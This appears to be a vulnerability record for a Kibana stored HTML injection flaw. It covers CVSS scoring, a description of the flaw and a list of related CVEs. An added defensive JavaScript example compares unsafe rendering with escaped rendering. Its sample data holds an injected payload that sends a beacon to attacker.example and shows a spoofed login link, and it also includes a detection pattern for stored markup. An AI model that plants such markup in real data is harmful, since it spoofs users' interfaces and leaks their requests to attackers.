CVE-2026-42401
4.1 MEDIUM
Improper Neutralization of Input During Web Page Generation (CWE-79) in Kibana can lead to stored HTML injection
Published: 2026-05-28 · Last updated: 2026-05-29
Severity and scoring
- CVSS: 4.1 MEDIUM
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
- CWE: CWE-79
Affected products
| Vendor | Product |
|---|---|
| elastic | kibana |
Description
Improper Neutralization of Input During Web Page Generation (CWE-79) in Kibana can lead to stored HTML injection. A user with write access to an Elasticsearch index could persist crafted markup which, when subsequently rendered through an affected Kibana view by another user, was not sufficiently sanitized. Successful exploitation could result in unauthorized UI manipulation and outbound network requests issued from the viewing user's browser session.
The vector is consistent with that description: PR:L because the precondition is write access to an index, not Kibana administrative rights; UI:R because a second user has to load the affected view; S:C because the effect lands in the viewing user's browser rather than in the component that stores the data. The impact is scoped to HTML injection rather than script execution: the listed consequences are spoofed UI (fake links, buttons or messages) and requests to attacker-chosen origins through resource-loading markup, which is why integrity is rated Low and confidentiality None. The affected version range is not recorded on this page; consult the vendor advisory before deciding which deployments need patching.
Source: NVD
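The pattern described above, as an added example that is not Kibana's code and does not reproduce the affected Kibana view (the page does not identify it). It shows the difference between interpolating an index field value straight into markup and escaping it first, approximates what the viewing browser would fetch from the unescaped result, and gives a defender a crude sweep over exported search hits to find stored markup. The `SAMPLE_HITS` documents, the `message` field, and the `attacker.example` beacon host are constructed for illustration.

```javascript
// Added example, not Kibana's code. Field names, payload and beacon host are
// constructed; the search-hit shape mirrors an Elasticsearch _search response.

// Constructed sample hits. The second one carries attacker-stored markup:
// an image that beacons to a remote host and a spoofed "sign in" link.
const SAMPLE_HITS = [
  { _id: "1", _source: { host: "web-01", message: "GET /index.html 200" } },
  { _id: "2", _source: { host: "web-02",
      message: '<img src="https://attacker.example/beacon?u=victim">' +
               '<a href="https://attacker.example/login">Session expired, sign in again</a>' } },
];

// Escape the five characters that matter in element-content and
// double-quoted attribute contexts. Ampersand must go first.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern (CWE-79): stored values concatenated into markup, so
// any tag in the value becomes part of the viewing user's DOM.
function renderRowUnsafe(hit) {
  return `<tr><td>${hit._source.host}</td><td>${hit._source.message}</td></tr>`;
}

// Hardened pattern: every untrusted value escaped before interpolation.
// The markup survives as visible text and cannot create elements.
function renderRowSafe(hit) {
  return `<tr><td>${escapeHtml(hit._source.host)}</td>` +
         `<td>${escapeHtml(hit._source.message)}</td></tr>`;
}

// Approximate the browser's behaviour: collect every remote src= / href=
// in the rendered HTML. Each is a request the viewer's browser would issue
// (src) or a click target it would honour (href) if the markup is live.
function outboundTargets(html) {
  const targets = [];
  const re = /\b(?:src|href)\s*=\s*"(https?:\/\/[^"]+)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) targets.push(m[1]);
  return targets;
}

// Defender's sweep over exported hits: flag string fields containing
// anything that looks like an HTML start tag. Deliberately crude; tune
// the pattern and the field list for the index being checked.
function findStoredMarkup(hits) {
  const startTag = /<\s*[a-z][a-z0-9-]*[\s>\/]/i;
  const findings = [];
  for (const hit of hits) {
    for (const [field, value] of Object.entries(hit._source)) {
      if (typeof value === "string" && startTag.test(value)) {
        findings.push({ id: hit._id, field });
      }
    }
  }
  return findings;
}

// Stand-alone run: compare the two renderings of the poisoned hit.
console.log("unsafe targets:", outboundTargets(renderRowUnsafe(SAMPLE_HITS[1])));
console.log("safe targets:  ", outboundTargets(renderRowSafe(SAMPLE_HITS[1])));
console.log("stored markup: ", findStoredMarkup(SAMPLE_HITS));
```

The escaping function is the minimum; in a real UI the right fix is to render untrusted strings through the framework's text nodes (or a vetted sanitizer when some markup must be allowed) rather than building HTML by string concatenation at all. The sweep is a triage aid for indices that an untrusted writer can reach, not a substitute for fixing the rendering side.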
References
Related CVEs
Same vendor
- CVE-2026-49095 — Improper Input Validation (CWE-20) in the Kibana Fleet agent policy management feature can lead to privilege escalation (6.5 MEDIUM)
- CVE-2026-49094 — Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130) (6.5 MEDIUM)
- CVE-2026-49093 — Server-Side Request Forgery (CWE-918) in Kibana can allow an authenticated user with connector management privileges to bypass the operat... (6.3 MEDIUM)
- CVE-2026-42400 — Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130) (6.5 MEDIUM)
- CVE-2026-42399 — Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130) (6.5 MEDIUM)
Same CWE
- CVE-2026-48157 — Slim is a PHP micro framework that enables users to write simple web applications and APIs (6.1 MEDIUM)
- CVE-2026-52702 — Unauthenticated Cross Site Scripting (XSS) in SEO Redirection <= 9.17 versions (7.1 HIGH)
- CVE-2026-49773 — Subscriber Cross Site Scripting (XSS) in FV Flowplayer Video Player < 7.5.51.7212 versions (6.5 MEDIUM)
- CVE-2026-49055 — Unauthenticated Cross Site Scripting (XSS) in Drag and Drop Multiple File Upload – Contact Form 7 <= 1.3.9.7 versions (7.1 HIGH)
- CVE-2026-48966 — Unauthenticated Cross Site Scripting (XSS) in Funnel Builder by FunnelKit <= 3.15.0.2 versions (7.1 HIGH)